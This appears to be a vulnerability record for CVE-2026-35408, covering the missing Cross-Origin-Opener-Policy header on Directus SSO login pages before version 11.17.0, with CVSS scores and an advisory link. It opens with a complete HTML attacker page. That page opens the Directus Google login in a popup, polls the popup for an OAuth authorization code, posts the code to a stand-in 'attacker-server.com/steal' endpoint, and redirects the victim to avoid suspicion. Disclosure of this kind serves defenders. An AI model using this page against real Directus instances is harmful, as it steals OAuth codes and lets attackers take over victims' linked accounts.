CVE-2026-35408

<!-- Attacker Page: exploit.html --> <!DOCTYPE html> <html> <head> <title>Wait for redirect...</title> </head> <body> <h2>Please wait while we redirect you...</h2> <script> // The target Directus SSO URL const targetUrl = 'https://target-directus-instance.com/auth/login/google'; // Open the Directus SSO page in a new window // Due to missing COOP header, this window remains accessible const openedWindow = window.open(targetUrl, 'DirectusLogin', 'width=500,height=600'); // Polling loop to check if the window has been redirected back to Directus const checkInterval = setInterval(() => { try { // Check if the window is closed if (openedWindow.closed) { clearInterval(checkInterval); return; } // Access the URL of the opened window (Possible because of missing COOP) const currentUrl = openedWindow.location.href; // Look for the authorization code or state in the URL if (currentUrl.includes('code=')) { console.log('Authorization Code intercepted:', currentUrl); // Send the intercepted URL to the attacker's server fetch('https://attacker-server.com/steal', { method: 'POST', body: JSON.stringify({ url: currentUrl }) }); // Close the window and clear interval openedWindow.close(); clearInterval(checkInterval); // Redirect victim to legitimate site to avoid suspicion window.location.href = 'https://target-directus-instance.com/admin'; } } catch (e) { // Access might be blocked if COOP was present, but here it is not console.log('Waiting for user interaction...'); } }, 1000); </script> </body> </html>

{"cve": {"id": "CVE-2026-35408", "sourceIdentifier": "[email protected]", "published": "2026-04-06T22:16:21.557", "lastModified": "2026-04-20T16:53:51.217", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, Directus's Single Sign-On (SSO) login pages lacked a Cross-Origin-Opener-Policy (COOP) HTTP response header. Without this header, a malicious cross-origin window that opens the Directus login page retains the ability to access and manipulate the window object of that page. An attacker can exploit this to intercept and redirect the OAuth authorization flow to an attacker-controlled OAuth client, causing the victim to unknowingly grant access to their authentication provider account (e.g. Google, Discord). This vulnerability is fixed in 11.17.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-346"}, {"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "11.17.0", "matchCriteriaId": "F2EBB337-0000-4792-940F-DAEFCFC17747"}]}]}], "references": [{"url": "https://github.com/directus/directus/security/advisories/GHSA-8m32-p958-jg99", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}